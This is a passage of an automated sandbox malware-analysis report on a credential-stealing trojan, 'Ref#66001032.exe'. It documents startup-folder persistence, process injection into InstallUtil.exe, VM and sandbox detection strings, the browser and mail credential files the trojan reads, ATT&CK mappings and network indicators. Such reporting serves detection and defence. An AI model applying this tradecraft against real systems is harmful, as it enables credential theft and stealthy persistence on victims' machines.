                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_06315EB9 push es; iretd 0_2_06315F94
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_06315F9B push es; ret 0_2_06315F9C
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_06315D33 push es; retf 0_2_06315D34
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_06317833 push es; retn 3176h 0_2_0631787C
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_06416AC9 push eax; retf 0_2_06416ACA
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_06414B92 push eax; retf 0_2_06414B93
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0294FF70 push es; ret 6_2_0294FF80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02940C45 push ebx; retf 6_2_02940C52
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_02940C6D push edi; retf 6_2_02940C7A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_065C4D50 push es; ret 6_2_065C4D60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_065CFAF0 push es; ret 6_2_065CFAF4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_065D76E1 push ecx; iretd 6_2_065D76EE
                      Source: 0.2.Ref#66001032.exe.3ddf210.4.raw.unpack, pWd53faKORc7IQ8VvuQ.csHigh entropy of concatenated method names: 'mnLacPOMou', 'nrFaNUurXY', 'bZHar4l879', 'r4BaT0P2nY', 'Txiay2WyG5', 'XqJa3KYeMb', 'V7gawKOtpx', 'oa9akHe8ug', 'mmfafCQSLT', 'iWkansQ5Tg'
                      Source: 0.2.Ref#66001032.exe.3ddf210.4.raw.unpack, zmUmP7oP4fer7FF7Ejw.csHigh entropy of concatenated method names: 'QKe3exemn9', 'D3330DxIc2', 'pET3zPV0SD', 'lO0HIYosr0', 'hFFHaVpvNT', 'eCqH7pi7lL', 'EJvHtpmVLW', 'nQXr3tq052', 'Lg4HsZnt5K', 'z5kHXUca4M'
                      Source: 0.2.Ref#66001032.exe.3ddf210.4.raw.unpack, EHQlZEUEjCutjXEc6Hq.csHigh entropy of concatenated method names: 'zrKcTimtQa', 'LpAcmeA159', 'uMCcykVcZn', 'iYXTD8h3XKkGlhJhOPF', 'AahEJIhHPis6YBwftP8', 'YhKUdF8wxy', 'N5CUPlAn2g', 'Xt1UegqNgt', 'jHmU0Ea8W9', 'pYKUzSaY3N'
                      Source: 0.2.Ref#66001032.exe.3ddf210.4.raw.unpack, YmFNjlc6eeo4QEFdPKS.csHigh entropy of concatenated method names: 'bajcjn66Es', 'mbncbSm4Bv', 'xVwcEZkxvu', 'eBZcMFg7XI', 'iefcdVM2HF', 'X5RcPij7VB', 'wusceMGlhw', 'WoKc00YOK5', 'mMnczIBTcN', 'y0K5IxRKsi'
                      Source: 0.2.Ref#66001032.exe.3ddf210.4.raw.unpack, eunYLeYhBsf7XGNV0QK.csHigh entropy of concatenated method names: 'x90YR14SWg', 'TY0YbRvGFu', 'je1YMQ6lv8', 'AVBYPW6SMF', 'Tm7YeifA0e', 'JFAY0hVtWX', 'igLYzCimSE', 'WadCIgYf1L', 'K4QCawkpLE', 'ykDC7IH7BO'
                      Source: 0.2.Ref#66001032.exe.3ddf210.4.raw.unpack, cwTvB654OC75eWlmL4Y.csHigh entropy of concatenated method names: 'LBR3uFhz1c4gG53MbKw', 'OBdybnJIdtKfIu1m08y', 'BvZoqGcPmM', 'vh0ry9Sq2v', 'HXGor2P3fR', 'PYwoDYZmME', 'bHvoTcMt1Y', 'rhXomTLKBQ', 'FG6b7a9lPP', 'qA65AZ0ITu'
                      Source: 0.2.Ref#66001032.exe.3ddf210.4.raw.unpack, pXBHNyolSiUavtVTU2b.csHigh entropy of concatenated method names: 'wx4o6n9Qt3', 'KFdoVk2E7w', 'bf5ohMNoUC', 'q11oJOLV9J', 'hKdoR0Tn7H', 'sxrojVpvGE', 'trpobb8EYa', 'H1noEGQgFx', 'DkqoMBNP9a', 'usrodKw2CH'
                      Source: C:\Users\user\Desktop\Ref#66001032.exeFile created: C:\Users\user\AppData\Roaming\Length.exeJump to dropped file

                      Boot Survival

                      Source: C:\Users\user\Desktop\Ref#66001032.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbsJump to dropped file
                      Source: C:\Users\user\Desktop\Ref#66001032.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbsJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Length.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match File source: Process Memory Space: Ref#66001032.exe PID: 2736, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: Ref#66001032.exe, 00000000.00000002.3469471200.00000000028BC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\Ref#66001032.exe Memory allocated: 2680000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Ref#66001032.exe Memory allocated: 2800000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Ref#66001032.exe Memory allocated: 4800000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2940000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2AF0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 4AF0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Length.exe Memory allocated: 1290000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Length.exe Memory allocated: 2FB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Length.exe Memory allocated: 4FB0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Ref#66001032.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Length.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                      Source: C:\Users\user\Desktop\Ref#66001032.exe Window / User API: threadDelayed 2326
                      Source: C:\Users\user\Desktop\Ref#66001032.exe Window / User API: threadDelayed 7464
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 961
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 1117
                      Source: C:\Users\user\AppData\Roaming\Length.exe Window / User API: threadDelayed 3141
                      Source: C:\Users\user\AppData\Roaming\Length.exe Window / User API: threadDelayed 6687
                      Source: C:\Windows\splwow64.exe Window / User API: threadDelayed 366
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\splwow64.exe Last function: Thread delayed
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\
                      Source: Length.exe, 0000000B.00000002.4608072366.0000000001377000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
                      Source: Ref#66001032.exe, 00000000.00000002.3469471200.00000000028BC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen
                      Source: Ref#66001032.exe, 00000000.00000002.3469471200.00000000028BC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft|VMWare|Virtual
                      Source: InstallUtil.exe, 00000006.00000002.4622064680.00000000054B5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll94
                      Source: Ref#66001032.exe, 00000000.00000002.3460243396.0000000000ACB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Ref#66001032.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\Ref#66001032.exe Process token adjusted: Debug
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\Ref#66001032.exe Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Ref#66001032.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Ref#66001032.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7738A6F0
Source: C:\Users\user\Desktop\Ref#66001032.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\Desktop\Ref#66001032.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\Desktop\Ref#66001032.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000
Source: C:\Users\user\Desktop\Ref#66001032.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000
Source: C:\Users\user\Desktop\Ref#66001032.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: B56008
Source: C:\Users\user\Desktop\Ref#66001032.exe; Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Local\Temp\excel_doc.xlsx"
Source: C:\Users\user\Desktop\Ref#66001032.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\wscript.exe; Process created: C:\Users\user\AppData\Roaming\Length.exe "C:\Users\user\AppData\Roaming\Length.exe"
Source: C:\Users\user\Desktop\Ref#66001032.exe; Queries volume information: C:\Users\user\Desktop\Ref#66001032.exe VolumeInformation
Source: C:\Users\user\Desktop\Ref#66001032.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Length.exe; Queries volume information: C:\Users\user\AppData\Roaming\Length.exe VolumeInformation
Source: C:\Users\user\Desktop\Ref#66001032.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Ref#66001032.exe.444bce8.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Ref#66001032.exe.444bce8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000006.00000002.4610997762.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.4610997762.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.4610997762.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.4600898814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.3486694329.0000000003861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.3486694329.0000000004436000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Ref#66001032.exe PID: 2736, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 6932, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                      Remote Access Functionality

Source: Yara match; File source: dump.pcap, type: PCAP
Source: Yara match; File source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Ref#66001032.exe.444bce8.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Ref#66001032.exe.444bce8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000006.00000002.4610997762.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.4610997762.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.4610997762.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.4600898814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.3486694329.0000000003861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.3486694329.0000000004436000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: Ref#66001032.exe PID: 2736, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: InstallUtil.exe PID: 6932, type: MEMORYSTR

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 111 Scripting | Valid Accounts | 121 Windows Management Instrumentation | 111 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Extra Window Memory Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 2 Registry Run Keys / Startup Folder | 211 Process Injection | 21 Obfuscated Files or Information | 1 Credentials in Registry | 311 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Registry Run Keys / Startup Folder | 2 Software Packing | NTDS | 1 Process Discovery | Distributed Component Object Model | 1 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 141 Virtualization/Sandbox Evasion | SSH | Keylogging | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Extra Window Memory Injection | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Masquerading | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 141 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 211 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

[Behavior graph: ID 1584676, Sample: Ref#66001032.exe, Startdate: 06/01/2025, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
Ref#66001032.exe | 39% | Virustotal | |
Ref#66001032.exe | 34% | ReversingLabs | Win32.Trojan.Leonem |
Ref#66001032.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\Length.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\Length.exe | 34% | ReversingLabs | Win32.Trojan.Leonem |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
http://oshi.atd | 0% | Avira URL Cloud | safe |
http://schemas.microso | 0% | Avira URL Cloud | safe |
https://oshi.at/YBbz | 0% | Avira URL Cloud | safe |
http://oshi.at | 0% | Avira URL Cloud | safe |
http://schemas.micros | 0% | Avira URL Cloud | safe |
https://oshi.at/YBbzd | 0% | Avira URL Cloud | safe |
https://oshi.at | 0% | Avira URL Cloud | safe |
https://oshi.atD | 0% | Avira URL Cloud | safe |
http://schemas.microsoft. | 0% | Avira URL Cloud | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
oshi.at | 5.253.86.15 | true | false | | high
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high
api.ipify.org | 104.26.12.205 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
https://oshi.at/YBbz | false | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.microso | excel_doc.xlsx.0.dr | false | Avira URL Cloud: safe | unknown
http://oshi.atd | Length.exe, 0000000B.00000002.4611018046.0000000003085000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003160000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.00000000030E8000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003144000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.ipify.org | Ref#66001032.exe, 00000000.00000002.3486694329.0000000004436000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000003861000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4610997762.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4600898814.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://schemas.mi | excel_doc.xlsx.0.dr | false | | high
http://schemas.mic | excel_doc.xlsx.0.dr | false | | high
https://github.com/mgravell/protobuf-neti | Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/14436606/23354 | Ref#66001032.exe, 00000000.00000002.3469471200.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://oshi.at | Length.exe, 0000000B.00000002.4611018046.0000000003085000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003160000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.00000000030E8000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003144000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://account.dyn.com/ | Ref#66001032.exe, 00000000.00000002.3486694329.0000000004436000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000003861000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4600898814.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://github.com/mgravell/protobuf-netJ | Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/11564914/23354; | Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/2152978/23354 | Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://oshi.at/YBbzd | Length.exe, 0000000B.00000002.4611018046.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003154000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/mgravell/protobuf-net | Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.microsoft. | excel_doc.xlsx.0.dr | false | Avira URL Cloud: safe | unknown
https://oshi.at | Ref#66001032.exe, 00000000.00000002.3469471200.0000000002801000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003071000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.micros | excel_doc.xlsx.0.dr | false | Avira URL Cloud: safe | unknown
https://api.ipify.org/t | InstallUtil.exe, 00000006.00000002.4610997762.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.micr | excel_doc.xlsx.0.dr | false | | high
https://oshi.atD | Length.exe, 0000000B.00000002.4611018046.0000000003085000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003160000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003144000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Ref#66001032.exe, 00000000.00000002.3469471200.0000000002801000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4610997762.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Length.exe, 0000000B.00000002.4611018046.0000000003071000.00000004.00000800.00020000.00000000.sdmp | false | | high

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.26.12.205 | api.ipify.org | United States | | 13335 | CLOUDFLARENETUS | false
162.254.34.31 | unknown | United States | | 64200 | VIVIDHOSTINGUS | true
5.253.86.15 | oshi.at | Cyprus | | 208046 | HOSTSLICK-GERMANYNL | false

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1584676
Start date and time: 2025-01-06 07:54:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 38s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
